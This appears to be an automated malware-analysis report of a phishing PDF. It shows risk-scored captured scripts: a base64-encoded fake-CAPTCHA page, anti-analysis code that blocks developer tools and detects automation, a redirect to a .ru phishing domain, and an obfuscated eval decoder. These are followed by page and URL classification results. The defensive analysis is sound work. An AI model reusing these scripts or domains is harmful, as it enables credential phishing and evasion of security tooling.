Windows Analysis Report
01-06-2025 Docu.invpd (1).pdf

{
    "risk_score": 7,
    "reasoning": "This script exhibits several high-risk behaviors, including dynamic code execution, data exfiltration, and redirects to suspicious domains. While the script may have a legitimate purpose, such as displaying a CAPTCHA challenge, the use of obfuscated code and interactions with untrusted domains raise significant security concerns. Further investigation is warranted to determine the true nature and intent of this script."
}

if(atob("aHR0cHM6Ly82Zy50cmlsaXZhcm5vci5ydS9OaUtVM0lTZy8=") == "nomatch"){
document.write(decodeURIComponent(escape(atob('PCFET0NUWVBFIGh0bWw+DQo8aHRtbCBsYW5nPSJlbiI+DQo8aGVhZD4NCiAgICA8c2NyaXB0IHNyYz0iaHR0cHM6Ly9jb2RlLmpxdWVyeS5jb20vanF1ZXJ5LTMuNi4wLm1pbi5qcyI+PC9zY3JpcHQ+DQogICAgPG1ldGEgaHR0cC1lcXVpdj0iWC1VQS1Db21wYXRpYmxlIiBjb250ZW50PSJJRT1FZGdlLGNocm9tZT0xIj4NCiAgICA8bWV0YSBuYW1lPSJyb2JvdHMiIGNvbnRlbnQ9Im5vaW5kZXgsIG5vZm9sbG93Ij4NCiAgICA8bWV0YSBuYW1lPSJ2aWV3cG9ydCIgY29udGVudD0id2lkdGg9ZGV2aWNlLXdpZHRoLCBpbml0aWFsLXNjYWxlPTEuMCI+DQogICAgPHRpdGxlPiYjODIwMzs8L3RpdGxlPg0KPHN0eWxlPg0KYm9keSwgaHRtbCB7DQptYXJnaW46IDA7DQpwYWRkaW5nOiAwOw0KaGVpZ2h0OiAxMDAlOw0Kb3ZlcmZsb3c6IGhpZGRlbjsNCn0NCg0KLmJhY2tncm91bmQtY29udGFpbmVyIHsNCiAgICBwb3NpdGlvbjogcmVsYXRpdmU7DQogICAgaGVpZ2h0OiAxMDAlOw0KICAgIHdpZHRoOiAxMDAlOw0KfQ0KLmJhY2tncm91bmQtY29udGFpbmVyIC5iYWNrZ3JvdW5kIHsNCiAgICBjb250ZW50OiAiIjsNCiAgICBwb3NpdGlvbjogYWJzb2x1dGU7DQogICAgdG9wOiAwOw0KICAgIGxlZnQ6IDA7DQogICAgcmlnaHQ6IDA7DQogICAgYm90dG9tOiAwOw0KICAgIGJhY2tncm91bmQ6IHdoaXRlOw0KICAgIGJhY2tncm91bmQtc2l6ZTogY292ZXI7DQogICAgYmFja2dyb3VuZC1yZXBlYXQ6IG5vLXJlcGVhdDsNCiAgICBiYWNrZ3JvdW5kLXBvc2l0aW9uOiBjZW50ZXI7DQogICAgZmlsdGVyOiBibHVyKDVweCk7DQogICAgei1pbmRleDogLTE7DQp9DQouY29udGVudCB7DQogICAgcG9zaXRpb246IHJlbGF0aXZlOw0KICAgIHotaW5kZXg6IDE7DQogICAgZGlzcGxheTogZmxleDsNCiAgICBqdXN0aWZ5LWNvbnRlbnQ6IGNlbnRlcjsNCiAgICBhbGlnbi1pdGVtczogY2VudGVyOw0KICAgIGhlaWdodDogMTAwJTsNCiAgICBjb2xvcjogd2hpdGU7DQogICAgZm9udC1zaXplOiAyNHB4Ow0KICAgIHRleHQtYWxpZ246IGNlbnRlcjsNCn0NCi5jYXB0Y2hhLWJveCB7DQogICAgZGlzcGxheTogZmxleDsNCiAgICBiYWNrZ3JvdW5kOiAjMDAwMDAwOGE7DQogICAgZmxleC1kaXJlY3Rpb246IGNvbHVtbjsNCiAgICBhbGlnbi1pdGVtczogY2VudGVyOw0KICAgIGp1c3RpZnktY29udGVudDogc3BhY2UtYmV0d2VlbjsNCiAgICBib3JkZXI6IDFweCBzb2xpZCAjMGYwZTBlOw0KICAgIHBhZGRpbmc6IDIwcHggMTBweDsNCiAgICB3aWR0aDogMzAwcHg7DQogICAgbWFyZ2luOiAyMHB4IGF1dG87DQogICAgYm9yZGVyLXJhZGl1czogNHB4Ow0KICAgIGJveC1zaGFkb3c6IDBweCAycHggNHB4IHJnYmEoMCwgMCwgMCwgMC4yKTsNCiAgICBwb3NpdGlvbjogcmVsYXRpdmU7DQp9DQoNCi5jYXB0Y2hhLWNoZWNrYm94IHsNCiAgICBkaXNwbGF5OiBmbGV4Ow0KICAgIGhlaWdodDogMjBweDsNCiAgICBhbGlnbi1pdGVtczogY2VudGVyOw0KICAgIHBvc2l0aW9uOiByZWxhdGl2ZTsNCn0NCg0KLmNhcHRjaGEtY2hlY2tib3ggaW5wdXRbdHlwZT0iY2hlY2tib3giXSB7DQogICAgZGlzcGxheTogbm9uZTsNCn0NCg0KLmNhcHRjaGEtY2hlY2tib3ggbGFiZWwgew0KICAgIGRpc3BsYXk6IGZsZXg7DQogICAgYWxpZ24taXRlbXM6IGNlbnRlcjsNCiAgICBjdXJzb3I6IHBvaW50ZXI7DQp9DQoNCi5jYXB0Y2hhLWNoZWNrbWFyayB7DQogICAgd2lkdGg6IDIwcHg7DQogICAgaGVpZ2h0OiAyMHB4Ow0KICAgIGJvcmRlcjogMnB4IHNvbGlkICNkM2QzZDM7DQogICAgYm9yZGVyLXJhZGl1czogM3B4Ow0KICAgIGJhY2tncm91bmQtY29sb3I6ICNmZmY7DQogICAgLyogbWFyZ2luLXJpZ2h0OiAxMHB4OyAqLw0KICAgIHBvc2l0aW9uOiByZWxhdGl2ZTsNCn0NCg0KLmNhcHRjaGEtY2hlY2tib3ggaW5wdXRbdHlwZT0iY2hlY2tib3giXTpjaGVja2VkICsgbGFiZWwgLmNhcHRjaGEtY2hlY2ttYXJrOjphZnRlciB7DQogICAgY29udGVudDogIiI7DQogICAgcG9zaXRpb246IGFic29sdXRlOw0KICAgIGxlZnQ6IDVweDsNCiAgICB0b3A6IDFweDsNCiAgICB3aWR0aDogNnB4Ow0KICAgIGhlaWdodDogMTJweDsNCiAgICBib3JkZXI6IHNvbGlkICM0Y2FmNTA7DQogICAgYm9yZGVyLXdpZHRoOiAwIDNweCAzcHggMDsNCiAgICB0cmFuc2Zvcm06IHJvdGF0ZSg0NWRlZyk7DQp9DQoNCi5jYXB0Y2hhLXRleHQgew0KICAgIGZvbnQtZmFtaWx5OiBBcmlhbCwgc2Fucy1zZXJpZjsNCiAgICBmb250LXNpemU6IDE0cHg7DQogICAgbGVmdDogNnB4Ow0KICAgIGNvbG9yOiAjZmZmZmZmOw0KICAgIHBvc2l0aW9uOiByZWxhdGl2ZTsNCn0NCg0KLmNhcHRjaGEtbG9nbyBpbWcgew0KICAgIGhlaWdodDogNDBweDsNCiAgICB0b3A6IDBweDsNCiAgICByaWdodDogMDsNCiAgICBmbG9hdDogcmlnaHQ7DQogICAgcG9zaXRpb246IHJlbGF0aXZlOw0KfQ0KDQouY2FwdGNoYS1sb2FkZXIgew0KIGJhY2tncm91bmQtY29sb3I6I2Y5ZjlmOTsNCiBib3JkZXI6NnB4IHNvbGlkICM0ZDkwZmU7DQogYm9yZGVyLXJhZGl1czozNnB4Ow0KIGJvcmRlci1ib3R0b20tY29sb3I6dHJhbnNwYXJlbnQ7DQogYm9yZGVyLXJpZ2h0LWNvbG9yOnRyYW5zcGFyZW50Ow0KIGhlaWdodDozNnB4Ow0KIG91dGxpbmU6MDsNCiBwb3NpdGlvbjpyZWxhdGl2ZTsNCiAvKnJpZ2h0OiAxODJweDsqLw0KIHdpZHRoOjM2cHg7DQogYm94LXNpemluZzpib3JkZXItYm94Ow0KIGFuaW1hdGlvbjogc3BpbiBsaW5lYXIgMXMgaW5maW5pdGU7DQogZGlzcGxheTogbm9uZTsNCn0NCg0KQGtleWZyYW1lcyBzcGluIHsNCiAgICAwJSB7IHRyYW5zZm9ybTogcm90YXRlKDBkZWcpOyB9DQogICAgMTAwJSB7IHRyYW5zZm9ybTogcm90YXRlKDM2MGRlZyk7IH0NCn0NCg0KLmNhcHRjaGEtY29udGVudCB7DQogICAgZGlz

{
    "risk_score": 8,
    "reasoning": "This script demonstrates several high-risk behaviors, including detecting the presence of web automation tools, disabling common browser debugging and developer tools, and redirecting the user to a suspicious domain. The script also includes a self-executing function that triggers a debugger statement, which could be used to detect and bypass security measures. Overall, this script exhibits a high level of malicious intent and should be considered a significant security risk."
}

if (navigator.webdriver || window.callPhantom || window._phantom || navigator.userAgent.includes("Burp")) {
        window.location = "about:blank";
}
document.addEventListener('keydown', function(event) {
    if (event.keyCode === 123) {
        event.preventDefault();
        return false;
    }

    if (
        (event.ctrlKey && event.keyCode === 85) ||
        (event.ctrlKey && event.shiftKey && event.keyCode === 73) ||
        (event.ctrlKey && event.shiftKey && event.keyCode === 67) ||
        (event.ctrlKey && event.shiftKey && event.keyCode === 74) ||
        (event.ctrlKey && event.shiftKey && event.keyCode === 75) ||
        (event.ctrlKey && event.keyCode === 72) ||
        (event.metaKey && event.altKey && event.keyCode === 73) ||
        (event.metaKey && event.altKey && event.keyCode === 67) ||
        (event.metaKey && event.keyCode === 85)
    ) {
        event.preventDefault();
        return false;
    }
});
document.addEventListener('contextmenu', function(event) {
    event.preventDefault();
    return false;
});
DcwjOriHIo = false;
(function GJeTpDUNDx() {
    let tDqSxldxPX = false;
    const NkOcnEgUbu = 100;
    setInterval(function() {
        const XqBnZeNgPU = performance.now();
        debugger;
        const iARokBUsgK = performance.now();
        if (iARokBUsgK - XqBnZeNgPU > NkOcnEgUbu && !tDqSxldxPX) {
            DcwjOriHIo = true;
            tDqSxldxPX = true;
            window.location.replace('https://accounts.google.com/');
        }
    }, 100);
})();

{
    "risk_score": 7,
    "reasoning": "This script demonstrates high-risk behavior by redirecting the user to an untrusted domain (kilivo.trilivarnor.ru) without user consent. The use of the URL fragment to construct the new URL is a common technique for obfuscating the final destination, which increases the risk of the redirection leading to a malicious site. Overall, this script exhibits suspicious behavior and poses a significant risk to the user's security and privacy."
}

        window.onload = function() {
            // Get the fragment (the part after the #) from the current URL
            var currentFragment = window.location.hash;

            // Base URL to redirect to
            var newBaseUrl = "https://kilivo.trilivarnor.ru/NiKU3ISg/";

            // Redirect to the new URL with the fragment
            window.location.href = newBaseUrl + currentFragment;
        };
    

{
    "risk_score": 10,
    "reasoning": "This script demonstrates multiple high-risk behaviors, including dynamic code execution via the Proxy object and eval, potential data exfiltration, and obfuscated code. The combination of these factors indicates a high likelihood of malicious intent, warranting a maximum risk score of 10."
}

new Proxy({},{get:(_,n)=>eval([...n].map(n=>+("">n)).join``.replace(/.{8}/g,n=>String.fromCharCode(+("0b"+n))))}).

{
  "contains_trigger_text": true,
  "trigger_text": "invoice.pdf",
  "prominent_button_name": "Review",
  "text_input_field_labels": "unknown",
  "pdf_icon_visible": false,
  "has_visible_captcha": false,
  "has_urgent_text": false,
  "has_visible_qrcode": false,
  "contains_chinese_text": false,
  "contains_fake_security_alerts": false
}

{
  "brands": [
    "Google Workspace"
  ]
}

{
  "contains_trigger_text": true,
  "trigger_text": "Tick to proceed",
  "prominent_button_name": "Tick to proceed",
  "text_input_field_labels": "unknown",
  "pdf_icon_visible": false,
  "has_visible_captcha": false,
  "has_urgent_text": false,
  "has_visible_qrcode": false,
  "contains_chinese_text": false,
  "contains_fake_security_alerts": false
}

{
    "typosquatting": false,
    "unusual_query_string": false,
    "suspicious_tld": false,
    "ip_in_url": false,
    "long_subdomain": true,
    "malicious_keywords": false,
    "encoded_characters": false,
    "redirection": false,
    "contains_email_address": false,
    "known_domain": true,
    "brand_spoofing_attempt": false,
    "third_party_hosting": true
}

URL: https://deql66fwe8583.z13.web.core.windows.net

{
  "brands": [
    "Tick to proceed"
  ]
}